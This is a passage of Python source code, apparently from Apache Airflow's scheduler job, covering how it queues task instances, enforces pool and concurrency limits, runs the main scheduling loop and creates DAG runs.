file, whether to serialize the DAG object to the DB
:type do_pickle: bool
:param log: override the default Logger
:type log: logging.Logger
"""
__mapper_args__ = {'polymorphic_identity': 'SchedulerJob'}
heartrate: int = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
subdir: str = settings.DAGS_FOLDER,
num_runs: int = conf.getint('scheduler', 'num_runs'),
num_times_parse_dags: int = -1,
processor_poll_interval: float = conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle: bool = False,
log: logging.Logger = None,
*args,
**kwargs,
):
self.subdir = subdir
self.num_runs = num_runs
# In specific tests, we want to stop the parse loop after the _files_ have been parsed a certain
# number of times. This is only to support testing, and isn't something a user is likely to want to
# configure -- they'll want num_runs
self.num_times_parse_dags = num_times_parse_dags
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
if log:
self._log = log
# Check what SQL backend we use
sql_conn: str = conf.get('core', 'sql_alchemy_conn').lower()
self.using_sqlite = sql_conn.startswith('sqlite')
self.using_mysql = sql_conn.startswith('mysql')
self.max_tis_per_query: int = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent: Optional[DagFileProcessorAgent] = None
self.dagbag = DagBag(dag_folder=self.subdir, read_dags_from_db=True, load_op_links=False)
def register_signals(self) -> None:
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
signal.signal(signal.SIGUSR2, self._debug_dump)
def _exit_gracefully(self, signum, frame) -> None: # pylint: disable=unused-argument
"""Helper method to clean up processor_agent to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def _debug_dump(self, signum, frame): # pylint: disable=unused-argument
try:
sig_name = signal.Signals(signum).name # pylint: disable=no-member
except Exception: # pylint: disable=broad-except
sig_name = str(signum)
self.log.info("%s\n%s received, printing debug\n%s", "-" * 80, sig_name, "-" * 80)
self.executor.debug_dump()
self.log.info("-" * 80)
def is_alive(self, grace_multiplier: Optional[float] = None) -> bool:
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold: int = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING
and (timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
@provide_session
def _change_state_for_tis_without_dagrun(
self, old_states: List[str], new_state: str, session: Session = None
) -> None:
"""
For all DAG IDs in the DagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns are
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
"""
tis_changed = 0
query = (
session.query(models.TaskInstance)
.outerjoin(models.TaskInstance.dag_run)
.filter(models.TaskInstance.dag_id.in_(list(self.dagbag.dag_ids)))
.filter(models.TaskInstance.state.in_(old_states))
.filter(
or_(
# pylint: disable=comparison-with-callable
models.DagRun.state != State.RUNNING,
# pylint: disable=no-member
models.DagRun.state.is_(None),
)
)
)
# We need to do this for mysql as well because it can cause deadlocks
# as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
if self.using_sqlite or self.using_mysql:
tis_to_change: List[TI] = with_row_locks(
query, of=TI, session=session, **skip_locked(session=session)
).all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
current_time = timezone.utcnow()
ti_prop_update = {
models.TaskInstance.state: new_state,
models.TaskInstance.start_date: current_time,
}
# Only add end_date and duration if the new_state is 'success', 'failed' or 'skipped'
if new_state in State.finished:
ti_prop_update.update(
{
models.TaskInstance.end_date: current_time,
models.TaskInstance.duration: 0,
}
)
tis_changed = (
session.query(models.TaskInstance)
.filter(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date == subq.c.execution_date,
)
.update(ti_prop_update, synchronize_session=False)
)
if tis_changed > 0:
session.flush()
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed,
new_state,
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(
self, states: List[str], session: Session = None
) -> Tuple[DefaultDict[str, int], DefaultDict[Tuple[str, str], int]]:
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: tuple[dict[str, int], dict[tuple[str, str], int]]
"""
ti_concurrency_query: List[Tuple[str, str, int]] = (
session.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map: DefaultDict[str, int] = defaultdict(int)
task_map: DefaultDict[Tuple[str, str], int] = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
# pylint: disable=too-many-locals,too-many-statements
@provide_session
def _executable_task_instances_to_queued(self, max_tis: int, session: Session = None) -> List[TI]:
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param max_tis: Maximum number of TIs to queue in this loop.
:type max_tis: int
:return: list[airflow.models.TaskInstance]
"""
executable_tis: List[TI] = []
# Get the pool settings. We get a lock on the pool rows, treating this as a "critical section"
# Throws an exception if lock cannot be obtained, rather than blocking
pools = models.Pool.slots_stats(lock_rows=True, session=session)
# If the pools are full, there is no point doing anything!
# If _somehow_ the pool is overfull, don't let the limit go negative - it breaks SQL
pool_slots_free = max(0, sum(pool['open'] for pool in pools.values()))
if pool_slots_free == 0:
self.log.debug("All pools are full!")
return executable_tis
max_tis = min(max_tis, pool_slots_free)
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
query = (
session.query(TI)
.outerjoin(TI.dag_run)
.filter(or_(DR.run_id.is_(None), DR.run_type != DagRunType.BACKFILL_JOB))
.join(TI.dag_model)
.filter(not_(DM.is_paused))
.filter(TI.state == State.SCHEDULED)
.options(selectinload('dag_model'))
)
starved_pools = [pool_name for pool_name, stats in pools.items() if stats['open'] <= 0]
if starved_pools:
query = query.filter(not_(TI.pool.in_(starved_pools)))
query = query.limit(max_tis)
task_instances_to_examine: List[TI] = with_row_locks(
query,
of=TI,
session=session,
**skip_locked(session=session),
).all()
# TODO[HA]: This was wrong before anyway, as it only looked at a sub-set of dags, not everything.
# Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(repr(x) for x in task_instances_to_examine)
self.log.info("%s tasks up for execution:\n\t%s", len(task_instances_to_examine), task_instance_str)
pool_to_task_instances: DefaultDict[str, List[models.Pool]] = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map: DefaultDict[str, int]
task_concurrency_map: DefaultDict[Tuple[str, str], int]
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=list(EXECUTION_STATES), session=session
)
num_tasks_in_executor = 0
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks_total = 0
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
# pylint: disable=too-many-nested-blocks
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning("Tasks using non-existent pool '%s' will not be scheduled", pool)
continue
open_slots = pools[pool]["open"]
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool,
open_slots,
num_ready,
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date)
)
num_starving_tasks = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info("Not scheduling since there are %s open slots in pool %s", open_slots, pool)
# Can't schedule any more since there are no more open slots.
num_unhandled = len(priority_sorted_task_instances) - current_index
num_starving_tasks += num_unhandled
num_starving_tasks_total += num_unhandled
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = task_instance.dag_model.concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id,
current_dag_concurrency,
dag_concurrency_limit,
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance,
dag_id,
dag_concurrency_limit,
)
continue
task_concurrency_limit: Optional[int] = None
if task_instance.dag_model.has_task_concurrency_limits:
# Many dags don't have a task_concurrency, so where we can avoid loading the full
# serialized DAG the better.
serialized_dag = self.dagbag.get_dag(dag_id, session=session)
if serialized_dag.has_task(task_instance.task_id):
task_concurrency_limit = serialized_dag.get_task(
task_instance.task_id
).task_concurrency
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info(
"Not executing %s since the task concurrency for"
" this task has been reached.",
task_instance,
)
continue
if task_instance.pool_slots > open_slots:
self.log.info(
"Not executing %s since it requires %s slots "
"but there are %s open slots in the pool %s.",
task_instance,
task_instance.pool_slots,
open_slots,
pool,
)
num_starving_tasks += 1
num_starving_tasks_total += 1
# Though we can execute tasks with lower priority if there's enough room
continue
executable_tis.append(task_instance)
open_slots -= task_instance.pool_slots
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge(f'pool.starving_tasks.{pool_name}', num_starving_tasks)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks_total)
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(repr(x) for x in executable_tis)
self.log.info("Setting the following tasks to queued state:\n\t%s", task_instance_str)
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(executable_tis)
session.query(TI).filter(filter_for_tis).update(
# TODO[ha]: should we use func.now()? How does that work with DB timezone on mysql when it's not
# UTC?
{TI.state: State.QUEUED, TI.queued_dttm: timezone.utcnow(), TI.queued_by_job_id: self.id},
synchronize_session=False,
)
for ti in executable_tis:
make_transient(ti)
return executable_tis
def _enqueue_task_instances_with_queued_state(self, task_instances: List[TI]) -> None:
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param task_instances: TaskInstances to enqueue
:type task_instances: list[TaskInstance]
"""
# actually enqueue them
for ti in task_instances:
command = TI.generate_command(
ti.dag_id,
ti.task_id,
ti.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=ti.pool,
file_path=ti.dag_model.fileloc,
pickle_id=ti.dag_model.pickle_id,
)
priority = ti.priority_weight
queue = ti.queue
self.log.info("Sending %s to executor with priority %s and queue %s", ti.key, priority, queue)
self.executor.queue_command(
ti,
command,
priority=priority,
queue=queue,
)
def _critical_section_execute_task_instances(self, session: Session) -> int:
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
HA note: This function is a "critical section" meaning that only a single executor process can execute
this function at the same time. This is achieved by doing ``SELECT ... from pool FOR UPDATE``. For DBs
that support NOWAIT, a "blocked" scheduler will skip this and continue on with other tasks (creating
new DAG runs, progressing TIs from None to SCHEDULED etc.); DBs that don't support this (such as
MariaDB or MySQL 5.x) the other schedulers will wait for the lock before continuing.
:param session:
:type session: sqlalchemy.orm.Session
:return: Number of task instance with state changed.
"""
if self.max_tis_per_query == 0:
max_tis = self.executor.slots_available
else:
max_tis = min(self.max_tis_per_query, self.executor.slots_available)
queued_tis = self._executable_task_instances_to_queued(max_tis, session=session)
self._enqueue_task_instances_with_queued_state(queued_tis)
return len(queued_tis)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session: Session = None):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if not self.executor.queued_tasks:
return
filter_for_ti_state_change = [
and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# The TI.try_number will return raw try_number+1 since the
# ti is not running. And we need to -1 to match the DB record.
TI._try_number == try_number - 1, # pylint: disable=protected-access
TI.state == State.QUEUED,
)
for dag_id, task_id, execution_date, try_number in self.executor.queued_tasks.keys()
]
ti_query = session.query(TI).filter(or_(*filter_for_ti_state_change))
tis_to_set_to_scheduled: List[TI] = with_row_locks(ti_query, session=session).all()
if not tis_to_set_to_scheduled:
return
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(tis_to_set_to_scheduled)
session.query(TI).filter(filter_for_tis).update(
{TI.state: State.SCHEDULED, TI.queued_dttm: None}, synchronize_session=False
)
for task_instance in tis_to_set_to_scheduled:
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(repr(x) for x in tis_to_set_to_scheduled)
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
@provide_session
def _process_executor_events(self, session: Session = None) -> int:
"""Respond to executor events."""
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
ti_primary_key_to_try_number_map: Dict[Tuple[str, str, datetime.datetime], int] = {}
event_buffer = self.executor.get_event_buffer()
tis_with_right_state: List[TaskInstanceKey] = []
# Report execution
for ti_key, value in event_buffer.items():
state: str
state, _ = value
# We create map (dag_id, task_id, execution_date) -> in-memory try_number
ti_primary_key_to_try_number_map[ti_key.primary] = ti_key.try_number
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
ti_key.dag_id,
ti_key.task_id,
ti_key.execution_date,
state,
ti_key.try_number,
)
if state in (State.FAILED, State.SUCCESS, State.QUEUED):
tis_with_right_state.append(ti_key)
# Return if no finished tasks
if not tis_with_right_state:
return len(event_buffer)
# Check state of finished tasks
filter_for_tis = TI.filter_for_tis(tis_with_right_state)
tis: List[TI] = session.query(TI).filter(filter_for_tis).options(selectinload('dag_model')).all()
for ti in tis:
try_number = ti_primary_key_to_try_number_map[ti.key.primary]
buffer_key = ti.key.with_try_number(try_number)
state, info = event_buffer.pop(buffer_key)
# TODO: should we fail RUNNING as well, as we do in Backfills?
if state == State.QUEUED:
ti.external_executor_id = info
self.log.info("Setting external_id for %s to %s", ti, info)
continue
if ti.try_number == buffer_key.try_number and ti.state == State.QUEUED:
Stats.incr('scheduler.tasks.killed_externally')
msg = (
"Executor reports task instance %s finished (%s) although the "
"task says its %s. (Info: %s) Was the task killed externally?"
)
self.log.error(msg, ti, state, ti.state, info)
request = TaskCallbackRequest(
full_filepath=ti.dag_model.fileloc,
simple_task_instance=SimpleTaskInstance(ti),
msg=msg % (ti, state, ti.state, info),
)
self.log.info('Setting task instance %s state to %s as reported by executor', ti, state)
ti.set_state(state)
self.processor_agent.send_callback_to_execute(request)
return len(event_buffer)
def _execute(self) -> None:
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = self.do_pickle and self.executor_class not in UNPICKLEABLE_EXECUTORS
self.log.info("Processing each file at most %s times", self.num_times_parse_dags)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds: int = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(
dag_directory=self.subdir,
max_runs=self.num_times_parse_dags,
processor_factory=type(self)._create_dag_file_processor,
processor_timeout=processor_timeout,
dag_ids=[],
pickle_dags=pickle_dags,
async_mode=async_mode,
)
try:
self.executor.job_id = self.id
self.executor.start()
self.register_signals()
self.processor_agent.start()
execute_start_time = timezone.utcnow()
self._run_scheduler_loop()
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s", execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
settings.Session.remove() # type: ignore
except Exception: # pylint: disable=broad-except
self.log.exception("Exception when executing SchedulerJob._run_scheduler_loop")
raise
finally:
try:
self.executor.end()
except Exception: # pylint: disable=broad-except
self.log.exception("Exception when executing Executor.end")
try:
self.processor_agent.end()
except Exception: # pylint: disable=broad-except
self.log.exception("Exception when executing DagFileProcessorAgent.end")
self.log.info("Exited execute loop")
@staticmethod
def _create_dag_file_processor(
file_path: str,
callback_requests: List[CallbackRequest],
dag_ids: Optional[List[str]],
pickle_dags: bool,
) -> DagFileProcessorProcess:
"""Creates DagFileProcessorProcess instance."""
return DagFileProcessorProcess(
file_path=file_path, pickle_dags=pickle_dags, dag_ids=dag_ids, callback_requests=callback_requests
)
def _run_scheduler_loop(self) -> None:
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/apache-airflow/img/scheduler_loop.jpg
:rtype: None
"""
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
is_unit_test: bool = conf.getboolean('core', 'unit_test_mode')
timers = EventScheduler()
# Check on start up, then every configured interval
self.adopt_or_reset_orphaned_tasks()
timers.call_regular_interval(
conf.getfloat('scheduler', 'orphaned_tasks_check_interval', fallback=300.0),
self.adopt_or_reset_orphaned_tasks,
)
timers.call_regular_interval(
conf.getfloat('scheduler', 'pool_metrics_interval', fallback=5.0),
self._emit_pool_metrics,
)
timers.call_regular_interval(
conf.getfloat('scheduler', 'clean_tis_without_dagrun_interval', fallback=15.0),
self._clean_tis_without_dagrun,
)
for loop_count in itertools.count(start=1):
with Stats.timer() as timer:
if self.using_sqlite:
self.processor_agent.run_single_parsing_loop()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug("Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
with create_session() as session:
num_queued_tis = self._do_scheduling(session)
self.executor.heartbeat()
session.expunge_all()
num_finished_events = self._process_executor_events(session=session)
self.processor_agent.heartbeat()
# Heartbeat the scheduler periodically
self.heartbeat(only_if_necessary=True)
# Run any pending timed events
next_event = timers.run(blocking=False)
self.log.debug("Next timed event is in %f", next_event)
self.log.debug("Ran scheduling loop in %.2f seconds", timer.duration)
if not is_unit_test and not num_queued_tis and not num_finished_events:
# If the scheduler is doing things, don't sleep. This means when there is work to do, the
# scheduler will run "as quick as possible", but when it's stopped, it can sleep, dropping CPU
# usage when "idle"
time.sleep(min(self._processor_poll_interval, next_event))
if loop_count >= self.num_runs > 0:
self.log.info(
"Exiting scheduler loop as requested number of runs (%d - got to %d) has been reached",
self.num_runs,
loop_count,
)
break
if self.processor_agent.done:
self.log.info(
"Exiting scheduler loop as requested DAG parse count (%d) has been reached after %d"
" scheduler loops",
self.num_times_parse_dags,
loop_count,
)
break
@provide_session
def _clean_tis_without_dagrun(self, session):
with prohibit_commit(session) as guard:
try:
self._change_state_for_tis_without_dagrun(
old_states=[State.UP_FOR_RETRY], new_state=State.FAILED, session=session
)
self._change_state_for_tis_without_dagrun(
old_states=[State.QUEUED, State.SCHEDULED, State.UP_FOR_RESCHEDULE, State.SENSING],
new_state=State.NONE,
session=session,
)
guard.commit()
except OperationalError as e:
if is_lock_not_available_error(error=e):
self.log.debug("Lock held by another Scheduler")
session.rollback()
else:
raise
guard.commit()
def _do_scheduling(self, session) -> int:
"""
This function is where the main scheduling decisions take places. It:
- Creates any necessary DAG runs by examining the next_dagrun_create_after column of DagModel
Since creating Dag Runs is a relatively time consuming process, we select only 10 dags by default
(configurable via ``scheduler.max_dagruns_to_create_per_loop`` setting) - putting this higher will
mean one scheduler could spend a chunk of time creating dag runs, and not ever get around to
scheduling tasks.
- Finds the "next n oldest" running DAG Runs to examine for scheduling (n=20 by default, configurable
via ``scheduler.max_dagruns_per_loop_to_schedule`` config setting) and tries to progress state (TIs
to SCHEDULED, or DagRuns to SUCCESS/FAILURE etc)
By "next oldest", we mean hasn't been examined/scheduled in the most time.
The reason we don't select all dagruns at once because the rows are selected with row locks, meaning
that only one scheduler can "process them", even it is waiting behind other dags. Increasing this
limit will allow more throughput for smaller DAGs but will likely slow down throughput for larger
(>500 tasks.) DAGs
- Then, via a Critical Section (locking the rows of the Pool model) we queue tasks, and then send them
to the executor.
See docs of _critical_section_execute_task_instances for more.
:return: Number of TIs enqueued in this iteration
:rtype: int
"""
# Put a check in place to make sure we don't commit unexpectedly
with prohibit_commit(session) as guard:
if settings.USE_JOB_SCHEDULE:
self._create_dagruns_for_dags(guard, session)
dag_runs = self._get_next_dagruns_to_examine(session)
# Bulk fetch the currently active dag runs for the dags we are
# examining, rather than making one query per DagRun
# TODO: This query is probably horribly inefficient (though there is an
# index on (dag_id,state)). It is to deal with the case when a user
# clears more than max_active_runs older tasks -- we don't want the
# scheduler to suddenly go and start running tasks from all of the
# runs. (AIRFLOW-137/GH #1442)
#
# The longer term fix would be to have `clear` do this, and put DagRuns
# in to the queued state, then take DRs out of queued before creating
# any new ones
# Build up a set of execution_dates that are "active" for a given
# dag_id -- only tasks from those runs will be scheduled.
active_runs_by_dag_id = defaultdict(set)
query = (
session.query(
TI.dag_id,
TI.execution_date,
)
.filter(
TI.dag_id.in_(list({dag_run.dag_id for dag_run in dag_runs})),
TI.state.notin_(list(State.finished) + [State.REMOVED]),
)
.group_by(TI.dag_id, TI.execution_date)
)
for dag_id, execution_date in query:
active_runs_by_dag_id[dag_id].add(execution_date)
for dag_run in dag_runs:
# Use try_except to not stop the Scheduler when a Serialized DAG is not found
# This takes care of Dynamic DAGs especially
# SerializedDagNotFound should not happen here in the same loop because the DagRun would
# not be created in self._create_dag_runs if Serialized DAG does not exist
# But this would take care of the scenario when the Scheduler is restarted after DagRun is
# created and the DAG is deleted / renamed
try:
self._schedule_dag_run(dag_run, active_runs_by_dag_id.get(dag_run.dag_id, set()), session)
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_run.dag_id)
continue
guard.commit()
# Without this, the session has an invalid view of the DB
session.expunge_all()
# END: schedule TIs
try:
if self.executor.slots_available <= 0:
# We know we can't do anything here, so don't even try!
self.log.debug("Executor full, skipping critical section")
return 0
timer = Stats.timer('scheduler.critical_section_duration')
timer.start()
# Find anything TIs in state SCHEDULED, try to QUEUE it (send it to the executor)
num_queued_tis = self._critical_section_execute_task_instances(session=session)
# Make sure we only sent this metric if we obtained the lock, otherwise we'll skew the
# metric, way down
timer.stop(send=True)
except OperationalError as e:
timer.stop(send=False)
if is_lock_not_available_error(error=e):
self.log.debug("Critical section lock held by another Scheduler")
Stats.incr('scheduler.critical_section_busy')
session.rollback()
return 0
raise
guard.commit()
return num_queued_tis
@retry_db_transaction
def _get_next_dagruns_to_examine(self, session):
"""Get Next DagRuns to Examine with retries"""
return DagRun.next_dagruns_to_examine(session)
@retry_db_transaction
def _create_dagruns_for_dags(self, guard, session):
"""Find Dag Models needing DagRuns and Create Dag Runs with retries in case of OperationalError"""
query = DagModel.dags_needing_dagruns(session)
self._create_dag_runs(query.all(), session)
# commit the session - Release the write lock on DagModel table.
guard.commit()
# END: create dagruns
def _create_dag_runs(self, dag_models: Iterable[DagModel], session: Session) -> None:
"""
Unconditionally create a DAG run for the given DAG, and update the dag_model's fields to control
if/when the next DAGRun should be created
"""
# Bulk Fetch DagRuns with dag_id and execution_date same
# as DagModel.dag_id and DagModel.next_dagrun
# This list is used to verify if the DagRun already exist so that we don't attempt to create
# duplicate dag runs
active_dagruns = (
session.query(DagRun.dag_id, DagRun.execution_date)
.filter(
tuple_(DagRun.dag_id, DagRun.execution_date).in_(
[(dm.dag_id, dm.next_dagrun) for dm in dag_models]
)
)
.all()
)
for dag_model in dag_models:
try:
dag = self.dagbag.get_dag(dag_model.dag_id, session=session)
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_model.dag_id)
continue
dag_hash = self.dagbag.dags_hash.get(dag.dag_id)
# Explicitly check if the DagRun already exists. This is an edge case
# where a Dag Run is created but `DagModel.next_dagrun` and `DagModel.next_dagrun_create_after`
# are not updated.
# We opted to check DagRun existence instead
# of catching an Integrity error and rolling back the session i.e
# we need to run self._update_dag_next_dagruns if the Dag Run already exists or if we
# create a new one. This is so that in the next Scheduling loop we try to create new runs
# instead of falling in a loop of Integrity Error.
if (dag.dag_id, dag_model.next_dagrun) not in active_dagruns:
run = dag.create_dagrun(
run_type=DagRunType.SCHEDULED,
execution_date=dag_model.next_dagrun,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False,
session=session,
dag_hash=dag_hash,
creating_job_id=self.id,
)
expected_start_date = dag.following_schedule(run.execution_date)
if expected_start_date:
schedule_delay = run.start_date - expected_start_date
Stats.timing(
f'dagrun.schedule_delay.{dag.dag_id}',
schedule_delay,
)
self._update_dag_next_dagruns(dag_models, session)
# TODO[HA]: Should we do a session.flush() so we don't have to keep lots of state/object in
# memory for larger dags? or expunge_all()
def _update_dag_next_dagruns(self, dag_models: Iterable[DagModel], session: Session) -> None:
"""
Bulk update the next_dagrun and next_dagrun_create_after for all the dags.
We batch the select queries to get info about all the dags at once
"""
# Check max_active_runs, to see if we are _now_ at the limit for any of
# these dag? (we've just created a DagRun for them after all)
active_runs_of_dags = dict(
session.query(DagRun.dag_id, func.count('*'))
.filter(
DagRun.dag_id.in_([o.dag_id for o in dag_models]),
DagRun.state == State.RUNNING, # pylint: disable=comparison-with-callable
DagRun.external_trigger.is_(False),
)
.group_by(DagRun.dag_id)
.all()
)
for dag_model in dag_models:
# Get the DAG in a try_except to not stop the Scheduler when a Serialized DAG is not found
# This takes care of Dynamic DAGs especially
try:
dag = self.dagbag.get_dag(dag_model.dag_id, session=session)
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_model.dag_id)
continue
active_runs_of_dag = active_runs_of_dags.get(dag.dag_id, 0)
if dag.max_active_runs and active_runs_of_dag >= dag.max_active_runs:
self.log.info(
"DAG %s is at (or above) max_active_runs (%d of %d), not creating any more runs",
dag.dag_id,
active_runs_of_dag,
dag.max_active_runs,
)
dag_model.next_dagrun_create_after = None
else:
dag_model.next_dagrun, dag_model.next_dagrun_create_after = dag.next_dagrun_info(
dag_model.next_dagrun
)
def _schedule_dag_run(
self,
dag_run: DagRun,
currently_active_runs: Set[datetime.datetime],
session: Session,
) -> int:
"""
Make scheduling decisions about an individual dag run
``currently_active_runs`` is passed in so that a batch query can be
used to ask this for all dag runs in the batch, to avoid an n+1 query.
:param dag_run: The DagRun to schedule
:param currently_active_runs: Number of currently active runs of this DAG
:return: Number of tasks scheduled
"""
dag = dag_run.dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
if not dag:
self.log.error("Couldn't find dag %s in DagBag/DB!", dag_run.dag_id)
return 0
if (
dag_run.start_date
and dag.dagrun_timeout
and dag_run.start_date < timezone.utcnow() - dag.dagrun_timeout
):
dag_run.set_state(State.FAILED)
unfinished_task_instances = (
session.query(TI)
.filter(TI.dag_id == dag_run.dag_id)
.filter(TI.execution_date == dag_run.execution_date)
.filter(TI.state.in_(State.unfinished))
)
for task_instance in unfinished_task_instances:
task_instance.state = State.SKIPPED
session.merge(task_instance)
session.flush()
self.log.info("Run %s of %s has timed-out", dag_run.run_id, dag_run.dag_id)
# Work out if we should allow creating a new DagRun now?
self._update_dag_next_dagruns([session.query(DagModel).get(dag_run.dag_id)], session)
callback_to_execute = DagCallbackRequest(
full_filepath=dag.fileloc,
dag_id=dag.dag_id,
execution_date=dag_run.execution_date,
is_failure_callback=True,
msg='timed_out',
)
# Send SLA & DAG Success/Failure Callbacks to be executed
self._send_dag_callbacks_to_processor(dag_run, callback_to_execute)
return 0
if dag_run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.error("Execution date is in future: %s", dag_run.execution_date)
return 0
if dag.max_active_runs:
if (
len(currently_active_runs) >= dag.max_active_runs
and dag_run.execution_date not in currently_active_runs
):
self.log.info(
"DAG %s already has %d active runs, not queuing any tasks for run %s",
dag.dag_id,
len(currently_active_runs),
dag_run.execution_date,
)
return 0
self._verify_integrity_if_dag_changed(dag_run=dag_run, session=session)
# TODO[HA]: Rename update_state -> schedule_dag_run, ?? something else?
schedulable_tis, callback_to_run = dag_run.update_state(session=session, execute_callbacks=False)
self._send_dag_callbacks_to_processor(dag_run, callback_to_run)
# This will do one query per dag run. We "could" build up a complex
# query to update all the TIs across all the execution dates and dag
# IDs in a single query, but it turns out that can be _very very slow_
# see #11147/commit ee90807ac for more details
return dag_run.schedule_tis(schedulable_tis, session)
@provide_session
